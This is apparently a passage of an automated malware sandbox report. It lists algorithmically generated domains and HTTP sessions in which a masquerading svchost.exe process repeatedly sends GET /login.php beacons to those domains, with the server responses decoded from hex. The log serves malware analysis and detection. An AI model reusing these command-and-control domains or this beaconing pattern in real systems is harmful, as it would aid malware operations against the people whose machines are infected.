                                                                                                                                                                                                                    • ww16.vofycot.com
                                                                                                                                                                                                                    • ww25.lyxynyx.com
                                                                                                                                                                                                                    • qetyhyg.com
                                                                                                                                                                                                                    • gatyhub.com
                                                                                                                                                                                                                    • lygyvuj.com
                                                                                                                                                                                                                    • gahyhiz.com
                                                                                                                                                                                                                    • www.gahyqah.com

                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  0192.168.2.64971418.208.156.248801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.962400913 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.382122040 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  1192.168.2.6497153.94.10.34801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.969291925 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394520044 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  2192.168.2.649716199.191.50.83801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.364603043 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.305301905 CET758INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Set-Cookie: vsid=903vr478893028933998491; expires=Sat, 10-Nov-2029 17:50:28 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                                  Location: //ww8.galyqaz.com
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.180229902 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.160233021 CET620INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Location: //ww3.galyqaz.com
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.541954994 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.655761957 CET861INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:49 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 28 31 30 29 3c 2f 68 33 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (10)</h3></div></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  3192.168.2.64971723.253.46.64801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.399502039 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.853502035 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:23 GMT
                                                                                                                                                                                                                  Content-Length: 1245
                                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.853533983 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  4192.168.2.649718188.114.96.3801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.415066004 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.131983995 CET972INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:29 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2WakQC1pF7YEFC7Sq8%2BNuvVrewozUUuxw9%2F%2BUMWRMWEqW3mLg69PFC6LRyCFavWY6C4DFYJrYw7hBF0szDswN5E03URBUXf4pvpW1H7%2Bh3GbxhTNNmwlb%2FtSpdOog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e101ff5ef87436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.289357901 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.640822887 CET982INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RIwduwIy7RZ6%2FkLQBQf403pwfjWpAWiKjPeEO5OXIjxfrYJbWgCIofXatTuAtbmzfufLg8xaZW%2FBS12BukB0wzRQuMOXx303Q%2F7xy8Y%2FUDUdU%2Ffvs0S8eoH%2BqXzB2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102005cc2a436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1218&sent=4&recv=6&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=2367947&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.291348934 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.643071890 CET975INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P8rC8xQHXQATHg8yOimx3atl5fCpL8ZpSiV9cOkHfuqCIIImDg45nGGIepvPuXwFeLRbcMSnyQ%2FRu89fS6m8tPRsr%2F4Hs0BpQjQ19fkwSZuRdArEkDLykq4b2kCGpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020700e32436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=7&recv=9&lost=0&retrans=0&sent_bytes=1954&recv_bytes=729&delivery_rate=2367947&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                                  Nov 11, 2024 18:50:50.023302078 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:50.392663002 CET981INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:50 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPhkxOzOMhFiNpMS9y92CWC8TzQKd9pjd91zXQqNhpTREZD2W%2B%2BeC2Obxh2B6mD0BcAIS6sN1SuWEzs6zHASSYc4zZoyE%2FfFfdP09m5FKPhdeqeaVaf%2FW5QgAv%2FNDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10207aed72436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1183&sent=10&recv=12&lost=0&retrans=0&sent_bytes=2929&recv_bytes=972&delivery_rate=2381578&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  5192.168.2.64971944.221.84.105801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.571708918 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.995461941 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  6192.168.2.64972044.221.84.105801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.613887072 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.047924995 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


